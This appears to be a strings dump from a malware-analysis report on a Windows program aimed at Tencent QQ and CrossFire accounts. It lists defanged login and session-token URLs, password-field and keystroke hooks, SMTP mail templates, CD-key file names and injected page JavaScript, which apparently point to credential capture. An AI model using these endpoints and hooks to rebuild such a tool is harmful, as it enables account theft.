&pt_randsalt=0&u1=http://cf.qq.com/cp/a20160217cfyj/index.htm?e_code=213271&h=1&t=1&g=1&from_ui=1&ptlang=2052&action=2-4-1457704626950&js_ver=10151&js_type=1&login_sig=&pt_uistyle=32&aid=21000124&daid=8&
pt_mbkey
pt_mbkey
[SKEY]
[SKEY]
"cdkey":"(.*?)"
"cdkey":"(.*?)"
[%d/d/d d:d]
[%d/d/d d:d]
\CF_CDKEY.ini
\CF_CDKEY.ini
hXXp://act.tgp.qq.com/index.php/
hXXp://act.tgp.qq.com/index.php/
Host: act.tgp.qq.com
Host: act.tgp.qq.com
X-Requested-With: XMLHttpRequest
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.122 Safari/537.36 SE 2.X MetaSr 1.0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.122 Safari/537.36 SE 2.X MetaSr 1.0
Referer: hXXp://act.tgp.qq.com/cf/cf20160325/index.html?ADTAG=bangbang.hdsq
Referer: hXXp://act.tgp.qq.com/cf/cf20160325/index.html?ADTAG=bangbang.hdsq
%7C
%7C
&user_checkparam=cf%7Cyes%7C
&user_checkparam=cf%7Cyes%7C
"msg":"
"msg":"
sMsg":"
sMsg":"
sMsg":"MODULE OK"
sMsg":"MODULE OK"
hXXp://apps.game.qq.com/ams/ame/ame.php?ameVersion=0.3&sServiceType=tgclub&iActivityId=
hXXp://apps.game.qq.com/ams/ame/ame.php?ameVersion=0.3&sServiceType=tgclub&iActivityId=
hXXp://bang.qq.com/actcenter/queryFilterActList
hXXp://bang.qq.com/actcenter/queryFilterActList
"url":"(.*?)"
"url":"(.*?)"
hXXp://kf.qq.com/cgi-bin/common?rand=0.7021259550817557&command=command=C00006&fromtype=kfweb&fromtoolid=kfweb514&type=getCFSpend&area=
hXXp://kf.qq.com/cgi-bin/common?rand=0.7021259550817557&command=command=C00006&fromtype=kfweb&fromtoolid=kfweb514&type=getCFSpend&area=
Referer:hXXp://kf.qq.com/game/consume_records.html?code=cf
Referer:hXXp://kf.qq.com/game/consume_records.html?code=cf
hXXp://apps.game.qq.com/cgi-bin/cf/userinfo/userinfo.cgi?ssn=
hXXp://apps.game.qq.com/cgi-bin/cf/userinfo/userinfo.cgi?ssn=
hXXp://VVV.baidu.com/
hXXp://VVV.baidu.com/
hXXp://bbs.cf.qq.com/home.php?mod=task&do=apply&id=5
hXXp://bbs.cf.qq.com/home.php?mod=task&do=apply&id=5
hXXp://bbs.cf.qq.com/home.php?mod=spacecp&ac=credit&showcredit=1
hXXp://bbs.cf.qq.com/home.php?mod=spacecp&ac=credit&showcredit=1
hXXp://bbs.cf.qq.com/forum.php?mod=forumdisplay&fid=30503&page=6
hXXp://bbs.cf.qq.com/forum.php?mod=forumdisplay&fid=30503&page=6
&extra=&replysubmit=yes&infloat=yes&handlekey=fastpost&inajax=1
&extra=&replysubmit=yes&infloat=yes&handlekey=fastpost&inajax=1
hXXp://bbs.cf.qq.com/forum.php?mod=post&action=reply&fid=30503&tid=
hXXp://bbs.cf.qq.com/forum.php?mod=post&action=reply&fid=30503&tid=
&posttime=
&posttime=
hXXp://bbs.cf.qq.com/home.php?mod=task&do=draw&id=5
hXXp://bbs.cf.qq.com/home.php?mod=task&do=draw&id=5
hXXp://bbs.cf.qq.com/forum.php
hXXp://bbs.cf.qq.com/forum.php
&searchkey=15051408311873756101000000000000&from=1&question=å…Â费枪&vip=0&bangdou=1
&searchkey=15051408311873756101000000000000&from=1&question=å…Â费枪&vip=0&bangdou=1
%7C322%7C
%7C322%7C
*&checkparam=cf%7Cyes%7C
*&checkparam=cf%7Cyes%7C
&ams_checkparam=cf%7Cyes%7C
&ams_checkparam=cf%7Cyes%7C
&e_code=0&g_code=0&eas_url=http%3A%2F%2Fbang.qq.com%2Fshop%2Findex%2Fcf%2F&eas_refer=&sServiceDepartment=xinyue&sServiceType=cf&sArea=
&e_code=0&g_code=0&eas_url=http%3A%2F%2Fbang.qq.com%2Fshop%2Findex%2Fcf%2F&eas_refer=&sServiceDepartment=xinyue&sServiceType=cf&sArea=
Referer:hXXp://bang.qq.com/comm-htdocs/js/ams/v0.2R02/ajaxcdr.swf
Referer:hXXp://bang.qq.com/comm-htdocs/js/ams/v0.2R02/ajaxcdr.swf
hXXp://apps.game.qq.com/ams/ame/ame.php?ameVersion=0.3&sServiceType=cf&iActivityId=38135&sServiceDepartment=xinyue&set_info=xinyue
hXXp://apps.game.qq.com/ams/ame/ame.php?ameVersion=0.3&sServiceType=cf&iActivityId=38135&sServiceDepartment=xinyue&set_info=xinyue
hXXp://bangbang.qq.com/php/robott3nologin/servey
hXXp://bangbang.qq.com/php/robott3nologin/servey
Referer:hXXp://bang.qq.com/actcenter/index/cf
Referer:hXXp://bang.qq.com/actcenter/index/cf
hXXp://bang.qq.com/ugc1/getActRecommend
hXXp://bang.qq.com/ugc1/getActRecommend
game=cf&mid=0&eid=5&surl=http://bangbang.qq.com/php/login?game=cf&durl=http://bang.qq.com/actcenter/index/cf?&ref=ingame01&ref=ingame01
game=cf&mid=0&eid=5&surl=http://bangbang.qq.com/php/login?game=cf&durl=http://bang.qq.com/actcenter/index/cf?&ref=ingame01&ref=ingame01
hXXp://bang.qq.com/user/scorePersonalAcenter
hXXp://bang.qq.com/user/scorePersonalAcenter
Referer: hXXp://bang.qq.com/main/tradeinfo/
Referer: hXXp://bang.qq.com/main/tradeinfo/
game=bangbang&mid=9&eid=9000&surl=http://bang.qq.com/main/tradeinfo/&durl=http://bang.qq.com/main/tradeinfo/&world=0&serviceType=2&ref=
game=bangbang&mid=9&eid=9000&surl=http://bang.qq.com/main/tradeinfo/&durl=http://bang.qq.com/main/tradeinfo/&world=0&serviceType=2&ref=
hXXp://bang.qq.com/user/scorePersonal
hXXp://bang.qq.com/user/scorePersonal
hXXp://bang.qq.com/comm-htdocs/js/ams/v0.2R02/ajaxcdr.swf
hXXp://bang.qq.com/comm-htdocs/js/ams/v0.2R02/ajaxcdr.swf
hXXp://cf.ams.game.qq.com/ams/ame/ame.php?ameVersion=0.3&sServiceType=cf&iActivityId=38135&sServiceDepartment=group_f
hXXp://cf.ams.game.qq.com/ams/ame/ame.php?ameVersion=0.3&sServiceType=cf&iActivityId=38135&sServiceDepartment=group_f
&e_code=0&g_code=0&eas_url=http%3A%2F%2Fdaoju.qq.com%2Fmall%2Fjudou2.0%2Fcf.shtml&eas_refer=&sServiceDepartment=djc&sServiceType=dj
&e_code=0&g_code=0&eas_url=http%3A%2F%2Fdaoju.qq.com%2Fmall%2Fjudou2.0%2Fcf.shtml&eas_refer=&sServiceDepartment=djc&sServiceType=dj
hXXp://apps.game.qq.com/ams/ame/ame.php?ameVersion=0.3&sServiceType=dj&iActivityId=11117&sServiceDepartment=djc&set_info=djc
hXXp://apps.game.qq.com/ams/ame/ame.php?ameVersion=0.3&sServiceType=dj&iActivityId=11117&sServiceDepartment=djc&set_info=djc
&e_code=0&g_code=0&eas_url=http%3A%2F%2Fdaoju.qq.com%2Fmall%2Fjudou2.0%2Fcf.shtml&eas_refer=&sServiceDepartment=djc
&e_code=0&g_code=0&eas_url=http%3A%2F%2Fdaoju.qq.com%2Fmall%2Fjudou2.0%2Fcf.shtml&eas_refer=&sServiceDepartment=djc
gameId=&sArea=&iSex=&sRoleId=&iGender=&sServiceType=dj&objCustomMsg=&areaname=&roleid=&rolelevel=&rolename=&areaid=&iActivityId=11117&iFlowId=96910&g_tk=
gameId=&sArea=&iSex=&sRoleId=&iGender=&sServiceType=dj&objCustomMsg=&areaname=&roleid=&rolelevel=&rolename=&areaid=&iActivityId=11117&iFlowId=96910&g_tk=
Referer:hXXp://daoju.qq.com/comm-htdocs/js/milo/ajaxcdr.swf?0.9721381550078127
Referer:hXXp://daoju.qq.com/comm-htdocs/js/milo/ajaxcdr.swf?0.9721381550078127
hXXp://djcapp.game.qq.com/daoju/v3/api/app/e_app/add_jf_firstlogin.php?appSource=ios&appVersion=35&sDeviceID=&p_tk=
hXXp://djcapp.game.qq.com/daoju/v3/api/app/e_app/add_jf_firstlogin.php?appSource=ios&appVersion=35&sDeviceID=&p_tk=
&e_code=0&g_code=0&eas_url=http%3A%2F%2Fdaoju.qq.com%2Fmall%2Ftask.shtml&eas_refer=&sServiceDepartment=djc
&e_code=0&g_code=0&eas_url=http%3A%2F%2Fdaoju.qq.com%2Fmall%2Ftask.shtml&eas_refer=&sServiceDepartment=djc
gameId=&sArea=&iSex=&sRoleId=&iGender=&sServiceType=dj&objCustomMsg=&areaname=&roleid=&rolelevel=&rolename=&areaid=&iActivityId=35644&iFlowId=204638&g_tk=
gameId=&sArea=&iSex=&sRoleId=&iGender=&sServiceType=dj&objCustomMsg=&areaname=&roleid=&rolelevel=&rolename=&areaid=&iActivityId=35644&iFlowId=204638&g_tk=
hXXp://apps.game.qq.com/ams/ame/ame.php?ameVersion=0.3&sServiceType=dj&iActivityId=35644&sServiceDepartment=djc&set_info=djc
hXXp://apps.game.qq.com/ams/ame/ame.php?ameVersion=0.3&sServiceType=dj&iActivityId=35644&sServiceDepartment=djc&set_info=djc
hXXp://iyouxi.vip.qq.com/ams3.0.php?_c=page&actid=23314&callback=vipSignNew.signCb&g_tk=
hXXp://iyouxi.vip.qq.com/ams3.0.php?_c=page&actid=23314&callback=vipSignNew.signCb&g_tk=
hXXp://iyouxi.vip.qq.com/ams3.0.php?actid=52002&g_tk=
hXXp://iyouxi.vip.qq.com/ams3.0.php?actid=52002&g_tk=
hXXp://iyouxi.vip.qq.com/ams3.0.php?_c=page&actid=22249&g_tk=
hXXp://iyouxi.vip.qq.com/ams3.0.php?_c=page&actid=22249&g_tk=
hXXp://iyouxi.vip.qq.com/ams3.0.php?actid=23074&g_tk_type=1&g_tk=
hXXp://iyouxi.vip.qq.com/ams3.0.php?actid=23074&g_tk_type=1&g_tk=
hXXp://iyouxi.vip.qq.com/ams3.0.php?_c=page&actid=54963&callback=vipSignNew.signCb&g_tk=
hXXp://iyouxi.vip.qq.com/ams3.0.php?_c=page&actid=54963&callback=vipSignNew.signCb&g_tk=
&e_code=0&g_code=0&eas_url=http%3A%2F%2Fxinyue.qq.com%2Fweb201410%2Fwebgame.shtml&eas_refer=http%3A%2F%2Fxinyue.qq.com%2Fweb201410%2Fwebgame.shtml&sServiceDepartment=xinyue&sServiceType=tgclub
&e_code=0&g_code=0&eas_url=http%3A%2F%2Fxinyue.qq.com%2Fweb201410%2Fwebgame.shtml&eas_refer=http%3A%2F%2Fxinyue.qq.com%2Fweb201410%2Fwebgame.shtml&sServiceDepartment=xinyue&sServiceType=tgclub
Referer: hXXp://xinyue.qq.com/comm-htdocs/js/milo/ajaxcdr.swf?0.7271989360451698
Referer: hXXp://xinyue.qq.com/comm-htdocs/js/milo/ajaxcdr.swf?0.7271989360451698
hXXp://apps.game.qq.com/ams/ame/ame.php?ameVersion=0.3&sServiceType=tgclub&iActivityId=21547&sServiceDepartment=xinyue&set_info=xinyue
hXXp://apps.game.qq.com/ams/ame/ame.php?ameVersion=0.3&sServiceType=tgclub&iActivityId=21547&sServiceDepartment=xinyue&set_info=xinyue
hXXp://starvip.qq.com/fcg-bin/v2/fcg_mobile_starvip_site_checkin?g_tk=
hXXp://starvip.qq.com/fcg-bin/v2/fcg_mobile_starvip_site_checkin?g_tk=
&_=1454839692917
&_=1454839692917
hXXp://x.pet.qq.com/vip_platform?cmd=set_sign_info&timer=1454839703753&callback=jQuery110205429354978259653_1454839692914&token=
hXXp://x.pet.qq.com/vip_platform?cmd=set_sign_info&timer=1454839703753&callback=jQuery110205429354978259653_1454839692914&token=
msg": "
msg": "
&pvsrc=102&s_p=0|http|&s_v=6.1.0.496&ozid=511022&vipid=&actid=68391&sid=&callback=json14530355412865&cache=3654
&pvsrc=102&s_p=0|http|&s_v=6.1.0.496&ozid=511022&vipid=&actid=68391&sid=&callback=json14530355412865&cache=3654
hXXp://iyouxi.vip.qq.com/ams3.0.php?g_tk=
hXXp://iyouxi.vip.qq.com/ams3.0.php?g_tk=
User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_0 like Mac OS X) AppleWebKit/600.1.3 (KHTML, like Gecko) Version/8.0 Mobile/12A4345d Safari/600.1.4
User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_0 like Mac OS X) AppleWebKit/600.1.3 (KHTML, like Gecko) Version/8.0 Mobile/12A4345d Safari/600.1.4
hXXp://proxy.vac.qq.com/cgi-bin/srfentry.fcgi?ts=1456988761581&g_tk=
hXXp://proxy.vac.qq.com/cgi-bin/srfentry.fcgi?ts=1456988761581&g_tk=
User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 9_2_1 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Mobile/13D15 QQ/6.2.2.402 Pixel/640 NetType/WIFI Mem/86
User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 9_2_1 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Mobile/13D15 QQ/6.2.2.402 Pixel/640 NetType/WIFI Mem/86
&_=1452520903377
&_=1452520903377
hXXp://pay.video.qq.com/fcgi-bin/sign?callback=jQuery111006800204519842937_1452520903238&low_login=1&uin=
hXXp://pay.video.qq.com/fcgi-bin/sign?callback=jQuery111006800204519842937_1452520903238&low_login=1&uin=
hXXp://buluo.qq.com/cgi-bin/bar/card/bar_list_by_page
hXXp://buluo.qq.com/cgi-bin/bar/card/bar_list_by_page
hXXp://buluo.qq.com/cgi-bin/bar/user/sign
hXXp://buluo.qq.com/cgi-bin/bar/user/sign
hXXp://qun.qzone.qq.com/cgi-bin/get_group_list?callbackFun=woaiwang&uin=
hXXp://qun.qzone.qq.com/cgi-bin/get_group_list?callbackFun=woaiwang&uin=
Referer: hXXp://qiandao.qun.qq.com/cgi-bin/sign
Referer: hXXp://qiandao.qun.qq.com/cgi-bin/sign
Host: qiandao.qun.qq.com
Host: qiandao.qun.qq.com
hXXp://qiandao.qun.qq.com/cgi-bin/sign
hXXp://qiandao.qun.qq.com/cgi-bin/sign
hXXp://qiandao.qun.qq.com/cgi-bin/new_flag
hXXp://qiandao.qun.qq.com/cgi-bin/new_flag
hXXp://c.pc.qq.com/fcgi-bin/signin?callback=jsonp1453084008086&_=1453084046097&mood_id=238&checkin_date=&remark=一æâ€Â¯Ã§Â©Â¿Ã¤Âºâ€˜Ã§Â®Â Ã¥ÂÆ’军万马æÂ¥ç›¸è§Â。
hXXp://c.pc.qq.com/fcgi-bin/signin?callback=jsonp1453084008086&_=1453084046097&mood_id=238&checkin_date=&remark=一æâ€Â¯Ã§Â©Â¿Ã¤Âºâ€˜Ã§Â®Â Ã¥ÂÆ’军万马æÂ¥ç›¸è§Â。
08 08 08 50
08 08 08 50
hXXp://cfzhushou.com/cfzs/help.html
hXXp://cfzhushou.com/cfzs/help.html
hXXp://cfzhushou.com/help.html
hXXp://cfzhushou.com/help.html
hXXp://ip.qq.com/cgi-bin/myip
hXXp://ip.qq.com/cgi-bin/myip
hXXps://aq.qq.com/cn2/safe_service/device_lock
hXXps://aq.qq.com/cn2/safe_service/device_lock
aid=21000124&captype=&protocol=https&clientype=2&disturblevel=&apptype=2&noBorder=noborder&showtype=embed&uin=
aid=21000124&captype=&protocol=https&clientype=2&disturblevel=&apptype=2&noBorder=noborder&showtype=embed&uin=
hXXps://ssl.captcha.qq.com/cap_union_verify_new?random=1480258509499
hXXps://ssl.captcha.qq.com/cap_union_verify_new?random=1480258509499
&pt_randsalt=0&u1=http://cf.qq.com&h=1&t=1&g=1&from_ui=1&ptlang=2052&action=2-4-1457704626950&js_ver=10151&js_type=1&login_sig=&pt_uistyle=32&aid=21000124&daid=8&
&pt_randsalt=0&u1=http://cf.qq.com&h=1&t=1&g=1&from_ui=1&ptlang=2052&action=2-4-1457704626950&js_ver=10151&js_type=1&login_sig=&pt_uistyle=32&aid=21000124&daid=8&
hXXp://ossweb-img.qq.com/images/clientpop/act/cf/GpmHelpAct.js
hXXp://ossweb-img.qq.com/images/clientpop/act/cf/GpmHelpAct.js
http2://ossweb
http2://ossweb
hXXp://ossweb
hXXp://ossweb
"img":"http2(.*?).jpg"
"img":"http2(.*?).jpg"
"hXXp://(.*?)":{
"hXXp://(.*?)":{
"~ /1~!
"~ /1~!
fD.nn'1r?
fD.nn'1r?
.KM8'
.KM8'
$&%cw]
$&%cw]
hXXp://leesin.zuhaowan.com-
hXXp://leesin.zuhaowan.com-
hXXp://leesin.zuhaowan.cn
hXXp://leesin.zuhaowan.cn
hXXp://captcha.qq.com/getimage?aid=210001040.5721703316085041
hXXp://captcha.qq.com/getimage?aid=210001040.5721703316085041
hXXp://cf.ams.game.qq.com/ams/ame/ame.php?ameVersion=0.3&sServiceType=cf&iActivityId=41615&sServiceDepartment=group_f
hXXp://cf.ams.game.qq.com/ams/ame/ame.php?ameVersion=0.3&sServiceType=cf&iActivityId=41615&sServiceDepartment=group_f
hXXp://apps.game.qq.com/ams/ame/ame.php?ameVersion=0.3&sServiceType=qqgame&iActivityId=41615&sServiceDepartment=group_h&set_info=group_h
hXXp://apps.game.qq.com/ams/ame/ame.php?ameVersion=0.3&sServiceType=qqgame&iActivityId=41615&sServiceDepartment=group_h&set_info=group_h
hXXp://webd.tgp.qq.com/cf/info_proxy/weapon_stat_info?&&zone_id=
hXXp://webd.tgp.qq.com/cf/info_proxy/weapon_stat_info?&&zone_id=
1970.01.01 08:00:00
1970.01.01 08:00:00
function timea(){var d,s;d=new Date();d.setTime('
function timea(){var d,s;d=new Date();d.setTime('
hXXp://cf.ams.game.qq.com/ams/ame/ame.php?ameVersion=0.3&sServiceType=cf&iActivityId=55856&sServiceDepartment=group_f
hXXp://cf.ams.game.qq.com/ams/ame/ame.php?ameVersion=0.3&sServiceType=cf&iActivityId=55856&sServiceDepartment=group_f
hXXp://apps.game.qq.com/cf/a20160726hxb/getUserTask.php?action=getMyTaskList&iArea=
hXXp://apps.game.qq.com/cf/a20160726hxb/getUserTask.php?action=getMyTaskList&iArea=
Referer:hXXp://cf.qq.com/act/a20160726hxb/index.htm
Referer:hXXp://cf.qq.com/act/a20160726hxb/index.htm
hXXp://apps.game.qq.com/daoju/appmarket/daoju_promotion/cloud_ticket/QueryCloudTicket.php?acctid=A100078&id=28&time=0.23177661886438727&_=1461381268102
hXXp://apps.game.qq.com/daoju/appmarket/daoju_promotion/cloud_ticket/QueryCloudTicket.php?acctid=A100078&id=28&time=0.23177661886438727&_=1461381268102
"sMsg":"MODULE OK"
"sMsg":"MODULE OK"
&e_code=0&g_code=0&eas_url=http%3A%2F%2Fbang.qq.com%2Fshop%2Findex%2Fcf%2F&eas_refer=http%3A%2F%2Fbang.qq.com%2Fmain%2Ftradeinfo%2F&sServiceDepartment=xinyue
&e_code=0&g_code=0&eas_url=http%3A%2F%2Fbang.qq.com%2Fshop%2Findex%2Fcf%2F&eas_refer=http%3A%2F%2Fbang.qq.com%2Fmain%2Ftradeinfo%2F&sServiceDepartment=xinyue
gameId=&sArea=&iSex=&sRoleId=&iGender=&sServiceType=tgclub&objCustomMsg=&areaname=&roleid=&rolelevel=&rolename=&areaid=&iActivityId=38135&iFlowId=
gameId=&sArea=&iSex=&sRoleId=&iGender=&sServiceType=tgclub&objCustomMsg=&areaname=&roleid=&rolelevel=&rolename=&areaid=&iActivityId=38135&iFlowId=
hXXp://apps.game.qq.com/ams/ame/ame.php?ameVersion=0.3&sServiceType=tgclub&iActivityId=38135&sServiceDepartment=xinyue&set_info=xinyue
hXXp://apps.game.qq.com/ams/ame/ame.php?ameVersion=0.3&sServiceType=tgclub&iActivityId=38135&sServiceDepartment=xinyue&set_info=xinyue
gameId=&sArea=&iSex=&sRoleId=&iGender=&sServiceType=tgclub&objCustomMsg=&areaname=&roleid=&rolelevel=&rolename=&areaid=&iActivityId=38135&iFlowId=214216&g_tk=
gameId=&sArea=&iSex=&sRoleId=&iGender=&sServiceType=tgclub&objCustomMsg=&areaname=&roleid=&rolelevel=&rolename=&areaid=&iActivityId=38135&iFlowId=214216&g_tk=
|322|
|322|
*&checkparam=cf|yes|
*&checkparam=cf|yes|
&ams_checkparam=cf|yes|
&ams_checkparam=cf|yes|
sCdKey=
sCdKey=
hXXp://cf.ams.game.qq.com/ams/ame/ame.php?ameVersion=0.3&sServiceType=cf&iActivityId=8918&sServiceDepartment=x1m1
hXXp://cf.ams.game.qq.com/ams/ame/ame.php?ameVersion=0.3&sServiceType=cf&iActivityId=8918&sServiceDepartment=x1m1
sMsg" : "
sMsg" : "
\gzip.dll
\gzip.dll
`.data
`.data
gzip.pdb
gzip.pdb
_u%SV
_u%SV
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E)
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E)
hXXp://apps.game.qq.com/cgi-bin/cf/a20090409forceout/getinfo.cgi
hXXp://apps.game.qq.com/cgi-bin/cf/a20090409forceout/getinfo.cgi
hXXp://cfzhushou.com/pay.html
hXXp://cfzhushou.com/pay.html
hXXps://ssl.ptlogin2.qq.com/ptqrshow?appid=21000124&e=2&l=M&s=4&d=72&v=4&t=0.061519597441372864&daid=8
hXXps://ssl.ptlogin2.qq.com/ptqrshow?appid=21000124&e=2&l=M&s=4&d=72&v=4&t=0.061519597441372864&daid=8
&js_ver=10151&js_type=1&login_sig=7qKho-IT4nBHQJBVoTYw6p-IGP0hieZLRsmCy5MWU7g0bRJNRkb5q8yH7BUA7cTM&pt_uistyle=20&aid=21000124&daid=8&
&js_ver=10151&js_type=1&login_sig=7qKho-IT4nBHQJBVoTYw6p-IGP0hieZLRsmCy5MWU7g0bRJNRkb5q8yH7BUA7cTM&pt_uistyle=20&aid=21000124&daid=8&
hXXps://ssl.ptlogin2.qq.com/ptqrlogin?ptredirect=1&u1=http://cf.qq.com/cp/a20160223czxlx/index.htm?e_code=213709&h=1&t=1&g=1&from_ui=1&ptlang=2052&action=6-0-
hXXps://ssl.ptlogin2.qq.com/ptqrlogin?ptredirect=1&u1=http://cf.qq.com/cp/a20160223czxlx/index.htm?e_code=213709&h=1&t=1&g=1&from_ui=1&ptlang=2052&action=6-0-
game.qq.com
game.qq.com
hXXps://xui.ptlogin2.qq.com/cgi-bin/xlogin?appid=21000124&s_url=hXXp://apps.game.qq.com&style=34
hXXps://xui.ptlogin2.qq.com/cgi-bin/xlogin?appid=21000124&s_url=hXXp://apps.game.qq.com&style=34
hXXp://cf.qq.com/cfvip/
hXXp://cf.qq.com/cfvip/
hXXp://xinyue.qq.com
hXXp://xinyue.qq.com
o%%co
o%%co
``PBi %c
``PBi %c
;ptlogin2
;ptlogin2
apps.game.qq.com
apps.game.qq.com
hXXp://login.game.qq.com/comm-cgi-bin/login/LoginReturnInfo.cgi?callback=jsonp21&game=cf
hXXp://login.game.qq.com/comm-cgi-bin/login/LoginReturnInfo.cgi?callback=jsonp21&game=cf
nickName":"
nickName":"
?kernel32.dll
?kernel32.dll
{56FDF344-FD6D-11d0-958A-006097C9A090}
{56FDF344-FD6D-11d0-958A-006097C9A090}
{EA1AFB91-9E28-4B86-90E9-9E9F8A5EEFAF}
{EA1AFB91-9E28-4B86-90E9-9E9F8A5EEFAF}
Report
Report
themepassword
themepassword
SysShadow.HostWnd
SysShadow.HostWnd
{6AEDBD6D-3FB5-418A-83A6-7F45229DC872}
{6AEDBD6D-3FB5-418A-83A6-7F45229DC872}
VBScript.RegExp
VBScript.RegExp
1970-01-01 00:00:00
1970-01-01 00:00:00
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Accept: image/gif, image/bmp, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Accept: image/gif, image/bmp, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
background(?:-image)?:.*?[\s]*?url[\s]*?\([#
background(?:-image)?:.*?[\s]*?url[\s]*?\([#
']?(.*?)[#
']?(.*?)[#
onkeydown|
onkeydown|
onkeyup|
onkeyup|
onkeypress|
onkeypress|
wA{0002DF05-0000-0000-C000-000000000046}
wA{0002DF05-0000-0000-C000-000000000046}
{D30C1661-CDAF-11D0-8A3E-00C04FC9E26E}
{D30C1661-CDAF-11D0-8A3E-00C04FC9E26E}
{6D5140C1-7436-11CE-8034-00AA006009FA}
{6D5140C1-7436-11CE-8034-00AA006009FA}
text|password|file
text|password|file
?)-D%f`
?)-D%f`
location.reload()
location.reload()
window.location.href="
window.location.href="
{25336920-03F9-11CF-8FD0-00AA00686F13}
{25336920-03F9-11CF-8FD0-00AA00686F13}
hXXp://ajax.googleapis.com/ajax/libs/jquery/1.9.1/jquery.min.js
hXXp://ajax.googleapis.com/ajax/libs/jquery/1.9.1/jquery.min.js
document.all.retjs.innerText=
document.all.retjs.innerText=
javascript:document.body.contentEditable='true';document.designMode='on';void 0;
javascript:document.body.contentEditable='true';document.designMode='on';void 0;
javascript:document.body.contentEditable='false';document.designMode='on';void 0;
javascript:document.body.contentEditable='false';document.designMode='on';void 0;
javascript:document.onsdragstart=document.onselectstart=document.oncontextmenu=function(){return true}
javascript:document.onsdragstart=document.onselectstart=document.oncontextmenu=function(){return true}
javascript:document.onselectstart = document.oncontextmenu = document.onmousedown = document.onkeydown = function(){return true;};
javascript:document.onselectstart = document.oncontextmenu = document.onmousedown = document.onkeydown = function(){return true;};
WarnOnHTTPSToHTTPRedirect
WarnOnHTTPSToHTTPRedirect
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings
HKEY_CLASSES_ROOT
HKEY_CLASSES_ROOT
HKEY_CURRENT_USER
HKEY_CURRENT_USER
HKEY_LOCAL_MACHINE
HKEY_LOCAL_MACHINE
HKEY_USERS
HKEY_USERS
type=password
type=password
[password]
[password]
var jies = document.getElementsByTagName('object');for(var jie in jies){if(jies[jie].classid=='clsid:D27CDB6E-AE6D-11cf-96B8-444553540000'){jies[jie].removeNode(true);}}
var jies = document.getElementsByTagName('object');for(var jie in jies){if(jies[jie].classid=='clsid:D27CDB6E-AE6D-11cf-96B8-444553540000'){jies[jie].removeNode(true);}}
user.qzone.qq.com
user.qzone.qq.com
mail.qq.com
mail.qq.com
onkeyup
onkeyup
type='password'
type='password'
type="password"
type="password"
, 1, , ,
, 1, , ,
var jie = document.createStyleSheet();jie.addRule('html','
var jie = document.createStyleSheet();jie.addRule('html','
').value="
').value="
document.getElementById('
document.getElementById('
LocationURL
LocationURL
{34A715A0-6587-11D0-924A-0020AFC7AC4D}
{34A715A0-6587-11D0-924A-0020AFC7AC4D}
SysShadow.Menu
SysShadow.Menu
Microsoft.XMLDOM
Microsoft.XMLDOM
14:00~16:00
14:00~16:00
12:00-19:00
12:00-19:00
1.2.18
1.2.18
%*.*f
%*.*f
MSWHEEL_ROLLMSG
MSWHEEL_ROLLMSG
WSOCK32.dll
WSOCK32.dll
msscript.ocx
msscript.ocx
VVV.dywt.com.cn
VVV.dywt.com.cn
USER32.DLL
USER32.DLL
\\.\Smartvsd
\\.\Smartvsd
\\.\PhysicalDrive%d
\\.\PhysicalDrive%d
\\.\Scsi%d:
\\.\Scsi%d:
HTTP/1.0
HTTP/1.0
%s
%s
Reply-To: %s
Reply-To: %s
From: %s
From: %s
To: %s
To: %s
Subject: %s
Subject: %s
Date: %s
Date: %s
Cc: %s
Cc: %s
%a, %d %b %Y %H:%M:%S
%a, %d %b %Y %H:%M:%S
SMTP
SMTP
;3 #>6.&
;3 #>6.&
'2, / 0&7!4-)1#
'2, / 0&7!4-)1#
(*.htm;*.html)|*.htm;*.html
(*.htm;*.html)|*.htm;*.html
its:%s::%s
its:%s::%s
(*.avi)|*.avi
(*.avi)|*.avi
WPFT532.CNV
WPFT532.CNV
WPFT632.CNV
WPFT632.CNV
EXCEL32.CNV
EXCEL32.CNV
write32.wpc
write32.wpc
Windows Write
Windows Write
mswrd632.wpc
mswrd632.wpc
Word for Windows 6.0
Word for Windows 6.0
wword5.cnv
wword5.cnv
Word for Windows 5.0
Word for Windows 5.0
mswrd832.cnv
mswrd832.cnv
mswrd632.cnv
mswrd632.cnv
Word 6.0/95 for Windows & Macintosh
Word 6.0/95 for Windows & Macintosh
html32.cnv
html32.cnv
.PAVCOleException@@
.PAVCOleException@@
.PAVCOleDispatchException@@
.PAVCOleDispatchException@@
right-curly-bracket
right-curly-bracket
left-curly-bracket
left-curly-bracket
0123456789
0123456789
c:\%original file name%.exe
c:\%original file name%.exe
GetKeyboardState
GetKeyboardState
InternetCanonicalizeUrlA
InternetCanonicalizeUrlA
.FNNNNNNNNNNNNNNV
.FNNNNNNNNNNNNNNV
.FNNNNNNNNNNNN
.FNNNNNNNNNNNN
.CNNNB
.CNNNB
.CNNd
.CNNd
ÃDDDDDDQC
ÃDDDDDDQC
PAD
PAD
AVIFIL32.dll
AVIFIL32.dll
MSVFW32.dll
MSVFW32.dll
oledlg.dll
oledlg.dll
RASAPI32.dll
RASAPI32.dll
1.0.15.507
1.0.15.507
